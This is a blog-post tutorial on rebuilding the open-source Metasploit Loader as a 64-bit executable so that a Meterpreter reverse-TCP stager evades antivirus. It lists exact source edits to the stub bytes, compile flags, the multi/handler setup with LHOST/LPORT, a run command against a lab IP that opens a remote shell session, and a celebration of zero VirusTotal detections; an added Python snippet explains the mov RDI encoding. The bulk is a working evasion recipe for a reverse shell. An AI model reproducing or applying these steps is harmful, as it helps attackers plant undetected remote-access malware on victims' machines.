Bypassing AV through Metasploit Loader 64-Bit

goswamiijaya, published in SecureBit
4 min read, Aug 27, 2020

This post continues the previous post, Bypassing AV through Metasploit Loader 32-Bit.

Here we use a 64-bit build of the Metasploit Loader to bypass antiviruses.

First, we edit the Metasploit Loader 32-bit source to make it compatible with 64-bit.

The 64-bit version loads the socket handle into the RDI register with a 10-byte instruction, in place of the 5-byte EDI instruction used in the 32-bit version.

Note: the hex opcode for mov RDI is 48 BF.

To build the executable we will use the Dev C++ IDE, which can be downloaded from the Dev-C++ project page on Sourceforge.
  • To make sure it is installed correctly, look for the GCC files; it should have both the 32-bit and 64-bit GCC toolchains.
  • Make a new project named Loader64 and save the file as Loader64.
  • Set the project type to C Project and the application type to Console Application, so that we can run it from the Command Prompt.
  • A new default file, as shown below, will be created.
  • Replace the default code with the raw main.c file from Metasploit Loader.
  • Copy the raw main.c, as shown below, into the new Loader64 project.
  • Save the file as Loader64.c.
(Figure: raw file main.c)
  • Make the following changes in Loader64.c, since the 64-bit version needs more bytes for the stub:
  • Line 107: replace size + 5 with size + 10
  • Line 114: add buffer[0] = 0x48; (as mov in hex is 48)
  • Line 115: add buffer[1] = 0xBF; (as rdi in hex is BF)
  • Line 118: replace 1 with 2 and 4 with 8
  • Line 121: replace 5 with 10

Also, put winsock2.h above windows.h; this is an error in the original code (see the previous post).
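The byte counts in the edits above follow from how x86 encodes `mov reg, imm`: 0xBF is the opcode `mov edi, imm32` (B8 plus the register index 7), and the 0x48 in front of it is the REX.W prefix that widens the destination to RDI and the immediate to 8 bytes, so the stub grows from 5 to 10 bytes. The following encoder/decoder is an added example, not code from the post or from Metasploit Loader; the register names and the sample handle value 0x1C4 are constructed for illustration.

```python
import struct

# Register numbering shared by the B8+rd opcode family (Intel SDM, Vol. 2).
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def encode_mov_imm(reg: str, value: int) -> bytes:
    """Machine code for `mov reg, imm` (B8+rd id, or REX.W B8+rd io)."""
    if reg in REGS32:
        # 1 opcode byte + 4-byte little-endian immediate = 5 bytes
        return bytes([0xB8 + REGS32.index(reg)]) + struct.pack("<I", value)
    if reg in REGS64:
        # REX.W prefix (0x48) + opcode + 8-byte immediate = 10 bytes
        return b"\x48" + bytes([0xB8 + REGS64.index(reg)]) + struct.pack("<Q", value)
    raise ValueError(f"unsupported register {reg!r}")


def decode_mov_imm(code: bytes):
    """Decode a leading `mov reg, imm`; returns (register, immediate, length)."""
    pos = 0
    wide = code[0] == 0x48  # REX.W alone: only rax..rdi are reachable
    if wide:
        pos = 1
    opcode = code[pos]
    if not 0xB8 <= opcode <= 0xBF:
        raise ValueError("not a mov reg, imm instruction")
    idx = opcode - 0xB8
    if wide:
        imm = struct.unpack_from("<Q", code, pos + 1)[0]
        return REGS64[idx], imm, pos + 1 + 8
    imm = struct.unpack_from("<I", code, pos + 1)[0]
    return REGS32[idx], imm, pos + 1 + 4


def stub_length(reg: str) -> int:
    """Bytes a loader must reserve in front of its stage for this register."""
    return len(encode_mov_imm(reg, 0))


if __name__ == "__main__":
    handle = 0x1C4  # constructed sample socket handle value
    for reg in ("edi", "rdi"):
        code = encode_mov_imm(reg, handle)
        print(reg, code.hex(" "), decode_mov_imm(code))
```

Running it prints the 5-byte `bf c4 01 00 00` for EDI and the 10-byte `48 bf c4 01 00 00 00 00 00 00` for RDI, which is exactly the `size + 5` to `size + 10` and `memcpy(..., 4)` to `memcpy(..., 8)` change the post makes.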

  • Make sure the compiler options include -lws2_32.
  • Now compile and run the code.
  • Copy Loader64.exe to the Desktop, for convenience.
  • Go to the Kali instance and start the multi/handler, which will receive the reverse shell from the Windows 7 machine.
  • Set PAYLOAD to windows/x64/meterpreter/reverse_tcp.
  • Set the other options, LHOST and LPORT.
  • Start the reverse TCP handler.
(Figure: Started Reverse TCP Handler)
  • Go to the Windows instance and start the command prompt.
  • Move to the folder where Loader64.exe is kept.
  • Try to run Loader64.exe from cmd; it requires host and port values.
  • Enter the values accordingly (refer to the figure).
  • Run: Loader64.exe 192.168.137.128 9500
  • Check the handler: a session has been created.
(Figure: Execute the payload)
  • On the Kali instance, we get a session.
(Figure: Meterpreter session)

A session has been created by the Metasploit Loader 64-bit, which goes undetected by many antiviruses.

Let's check the payload on VirusTotal to see whether it bypasses the antivirus engines.

  • What could be more heartwarming than getting the statement "No engines detected this file"?
(Figure: Antivirus couldn't detect the payload)
  • So, yes, the payload wasn't detected by any of the antiviruses on VirusTotal. 👾
